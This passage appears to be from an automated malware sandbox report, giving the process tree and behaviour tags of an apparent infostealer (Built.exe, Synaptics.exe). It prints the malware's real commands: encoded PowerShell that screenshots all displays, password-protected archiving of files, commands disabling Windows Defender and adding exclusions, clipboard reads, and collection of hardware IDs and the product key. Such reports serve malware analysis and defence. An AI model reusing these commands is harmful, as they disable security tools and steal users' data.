AoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:32 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ix1vdpr\2ix1vdpr.cmdline"7⤵PID:4124
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE00.tmp" "c:\Users\Admin\AppData\Local\Temp\2ix1vdpr\CSC27FED50146E54C04BAA927D5FD5A552.TMP"8⤵PID:1676
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1400
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4388
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3920
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2984
-
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:956
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:2320
-
C:\Windows\system32\getmac.exegetmac6⤵PID:2896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40682\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\aVj2k.zip" *"5⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\_MEI40682\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI40682\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\aVj2k.zip" *6⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:2764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3104
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:4888
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:4324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:4416
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:3128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:4704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:3828
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:4412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2620
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dllArena.exe"C:\Users\Admin\AppData\Local\Temp\dllArena.exe"3⤵
- Executes dropped EXE
PID:3940
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2984
-
-
-
C:\Users\Admin\AppData\Local\Temp\dllArena.exe"C:\Users\Admin\AppData\Local\Temp\dllArena.exe"4⤵
- Executes dropped EXE
PID:4440
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4712
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\dllArena.exe"C:\Users\Admin\AppData\Local\Temp\dllArena.exe"1⤵
- Executes dropped EXE
PID:1768
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Executes dropped EXE
PID:664 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵PID:1988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:3712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:960
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4616
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:384
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2408
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3692
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:468
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIA